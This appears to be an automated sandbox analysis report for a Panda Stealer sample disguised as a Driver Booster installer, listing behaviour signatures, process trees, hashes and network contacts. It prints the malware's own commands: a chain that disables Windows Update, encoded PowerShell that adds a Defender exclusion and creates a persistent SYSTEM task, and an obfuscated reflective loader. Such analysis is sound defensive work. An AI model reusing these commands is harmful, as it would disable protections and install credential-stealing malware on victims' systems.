memory/436-398-0x0000000076EB1000-0x0000000076EB2000-memory.dmp

memory/1852-415-0x0000000000290000-0x0000000000298000-memory.dmp

memory/1472-413-0x0000000077050000-0x0000000077126000-memory.dmp

memory/1472-412-0x0000000072BB0000-0x000000007315B000-memory.dmp

C:\Windows\Tasks\dialersvc32.job

MD5 5d1e3ddd710c22a98c395c4ddf70d1d6
SHA1 617e9fbaf1faf9d8467f918ea38175313ccd8e9e
SHA256 428ac3eb102e83da4bf95f6349fbfcdaffe44555bc1e714518982fd520356bdb
SHA512 cc2bb444d351a5894af09666dbf01f608399c67a7d4debddaec96dc5ec8b87c7994543be44ec126102381aa43a0a56d8da696a8fbff90e817b5a026683fac2df

memory/1852-438-0x000000000151B000-0x0000000001582000-memory.dmp

memory/1852-439-0x000007FEEE690000-0x000007FEEF02D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-14 17:33

Reported

2024-04-14 17:46

Platform

win10v2004-20240412-en

Max time kernel

16s

Max time network

11s

Command Line

"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"

Signatures

Panda Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

PandaStealer

stealer pandastealer

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3608 set thread context of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3952 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 3952 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 3952 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 3952 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 3952 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 3952 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 3952 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
PID 3952 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
PID 1096 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp
PID 1096 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp
PID 1096 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp
PID 3608 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3608 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe
PID 1748 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe
PID 1748 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe
PID 3608 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\cmd.exe
PID 3608 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\cmd.exe
PID 3608 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\cmd.exe
PID 3608 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\cmd.exe
PID 2464 wrote to memory of 3296 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2464 wrote to memory of 3296 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3364 wrote to memory of 3284 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3364 wrote to memory of 3284 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2464 wrote to memory of 4212 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2464 wrote to memory of 4212 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe

"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"

C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe

"C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"

C:\Users\Admin\AppData\Local\Temp\lrucache.exe

"C:\Users\Admin\AppData\Local\Temp\lrucache.exe"

C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp" /SL5="$9017E,28225140,139264,C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe

"C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe" "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe" /title="Driver Booster 10" /dbver=10.4.0.128 /eula="C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\EULA.rtf" /showlearnmore /pmtproduct /nochromepmt

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAFkAQQBjAHcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAVQBBAGMAdwBCAGwAQQBIAEkAQQBjAHcAQgBjAEEARwA4AEEAYwBBAEIAbABBAEgASQBBAFkAUQBCAGMAQQBFAEUAQQBjAEEAQgB3AEEARQBRAEEAWQBRAEIAMABBAEcARQBBAFgAQQBCAE0AQQBHADgAQQBZAHcAQgBoAEEARwB3AEEAWABBAEIAVQBBAEcAVQBBAGIAUQBCAHcAQQBGAHcAQQBZAGcAQgBqAEEARABNAEEATwBRAEEAdwBBAEQASQBBAFoAQQBBADQAQQBEAEUAQQBNAHcAQQB5AEEARwBZAEEATgBBAEEAegBBAEcAVQBBAE0AdwBCAGgAQQBHAFUAQQBNAEEAQQA0AEEARABZAEEAWQBRAEEAdwBBAEQAQQBBAE8AUQBBADUAQQBEAGMAQQBPAFEAQgBtAEEARwBFAEEATwBBAEEANABBAEYAdwBBAFYAdwBCAEQAQQBFAE0AQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAFMAQQBCAHYAQQBIAE0AQQBkAEEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAZAB3AEIANQBBAEgARQBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwBvAHMAdwBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAaAB5AGIAdgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGYAeQBjACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBEAEIAYQBzAHMAaQBzAHQAYQBuAHQAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBhAGQAZwBxACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVwBDAEMATgBhAHQAaQB2AGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAG8AcABlAHIAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYgBjADMAOQAwADIAZAA4ADEAMwAyAGYANAAzAGUAMwBhAGUAMAA4ADYAYQAwADAAOQA5ADcAOQBmAGEAOAA4AFwAVwBDAEMATgBhAHQAaQB2AGUASABvAHMAdAAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBtAGMAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdQBkAG4AeQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARABCAGEAcwBzAGkAcwB0AGEAbgB0ACcAOwA="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{0bfb6594-2045-438a-a5c3-bc91e2af0f2c}

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHYAcwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAG8AcABlAHIAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYgBjADMAOQAwADIAZAA4ADEAMwAyAGYANAAzAGUAMwBhAGUAMAA4ADYAYQAwADAAOQA5ADcAOQBmAGEAOAA4AFwAVwBDAEMATgBhAHQAaQB2AGUASABvAHMAdAAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAdwB5AHEAIwA+AA=="

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 f0854165.xsph.ru udp
RU 141.8.193.236:80 f0854165.xsph.ru tcp
US 8.8.8.8:53 11.2.37.23.in-addr.arpa udp
US 8.8.8.8:53 236.193.8.141.in-addr.arpa udp
US 8.8.8.8:53 update.iobit.com udp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 8.8.8.8:53 140.20.199.152.in-addr.arpa udp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp

Files

memory/3952-0-0x0000000000400000-0x00000000022FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe

MD5 ccc48304afa2e7c58492babc297db8a4
SHA1 decd98730cf34e1567965f6fb7085569fc1053e8
SHA256 e02061a4626f950b41d89c21e9a780f8aee5c5ddda7880b753d660db09117910
SHA512 79bd4dda233b714ecd6746c5f78f9d441852e333202fc74da6430d23d7dc1deadebb5a5608da63ac63ee0891a99ee259d3498d58ac59621226d8bf7862de4b04

C:\Users\Admin\AppData\Local\Temp\lrucache.exe

MD5 6a4308bc229b64cf5bc6d359056b8980
SHA1 29f6484fafd50f0c00b5be01d97e82ffeda6f75b
SHA256 5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7
SHA512 f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364

memory/1096-84-0x0000000000400000-0x000000000042C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe

MD5 0e31bfc197cf7557b6ba5c18ecb1e5b2
SHA1 78ec7c8f28568611cf524f30b67875e031a09cb2
SHA256 87890cb7476446f228fe1edaf236bd4e02d0f6372805a309bf2773ec64737d78
SHA512 700b21c7be3d558970c137cded2e6079b5f2d5ce12495c576a281d210f32c3de3b0369bcfefcf7f666465498c6010c7d33001c098bbe08c2a2f23c10ff67a2e0

memory/3608-169-0x00000000009E0000-0x0000000000C94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp

MD5 68b52a0b8e3d45bf3b520a0e7f16dad1
SHA1 e50408326eafb5ca8adc70db29c33b64e25bbbbd
SHA256 b409d6d6f8896dc2afd1774479c741ca253c0e9b4732daaa08af84aa9c96888b
SHA512 b8e0b486e2b9652831eb8efe48cf9575eef49204e827a64d69ae7c9c30304b2d98a66c28f1072fe8596847c15f13bbf7ec39d7708684ff64051bbae7ed063faf

memory/3608-181-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

memory/1748-182-0x00000000007E0000-0x00000000007E1000-memory.dmp

memory/3608-186-0x000000001CB70000-0x000000001CE0A000-memory.dmp

memory/3608-187-0x0000000001B70000-0x0000000001B80000-memory.dmp

memory/3040-192-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

memory/3040-194-0x000001CFFDA30000-0x000001CFFDA40000-memory.dmp

memory/3040-193-0x000001CFFDA30000-0x000001CFFDA40000-memory.dmp

